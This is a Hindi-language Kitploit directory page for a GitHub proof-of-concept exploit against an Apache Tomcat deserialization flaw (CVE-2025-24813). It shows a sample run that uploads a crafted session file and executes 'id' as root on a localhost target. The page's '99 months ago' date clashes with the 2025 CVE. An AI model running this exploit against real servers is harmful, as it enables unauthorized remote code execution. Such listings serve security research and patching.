Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-24813-PoC-exploit — Apache Tomcat डिसीरियलाइज़ेशन RCE (CVE-2025-24813) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। PUT अनुरोध के माध्यम से क्राफ्टेड सत्र फ़ाइल अपलोड करता है और लक्ष्य सर्वर पर मनमाने कमांड निष्पादित करने के लिए डिसीरियलाइज़ेशन ट्रिगर करता है। | Kitploit
उपकरण/GitHubGitHub/gunyakit/cve-2025-24813-poc-exploit
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगरिमोट एक्सेस टूलपेलोड डेवलपमेंट
GitHubgunyakit/cve-2025-24813-poc-exploit

CVE-2025-24813-PoC-exploit

Apache Tomcat डिसीरियलाइज़ेशन RCE (CVE-2025-24813) के लिए प्रूफ-ऑफ-कॉन्सेप्ट एक्सप्लॉइट। PUT अनुरोध के माध्यम से क्राफ्टेड सत्र फ़ाइल अपलोड करता है और लक्ष्य सर्वर पर मनमाने कमांड निष्पादित करने के लिए डिसीरियलाइज़ेशन ट्रिगर करता है।

रिपॉजिटरी देखें
99 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-24813-PoC-exploit

Apache Tomcat डिसीरियलाइज़ेशन RCE

root@kitploit:~
❯ python3 exploit.py http://localhost:8080/ "id"
============================================================
CVE-2025-24813 - Apache Tomcat Partial PUT RCE
============================================================

[*] Target: http://localhost:8080
[*] Command: id

[*] Creating exploit payload...
[*] Uploading payload via PUT to: http://localhost:8080/session/exploit.session
[*] PUT Response: 201
[+] Payload uploaded successfully!

[*] Triggering deserialization...
[*] Trigger Response: 200

[*] Response body:

<!DOCTYPE html>
<html>
<head><title>Deserialization Triggered!</title></head>
<body style="background:#1a1a2e;color:#e0e0e0;font-family:monospace;padding:2rem;">
<h1 style="color:#ef4444;">⚠️ Deserialization RCE Triggered!</h1>
<p>Session file deserialized: exploit.session</p>
<p>Command executed: <code style="color:#4ade80;">id</code></p>
<hr>
<pre style="background:#0a0a0a;padding:1rem;border-radius:8px;color:#00d4ff;">
uid=0(root) gid=0(root) groups=0(root)

</pre>
</body>
</html>


[*] Exploit complete!

If deserialization worked, check target for command execution.
For blind RCE, use out-of-band techniques (DNS/HTTP callbacks)
टूल डाउनलोड करें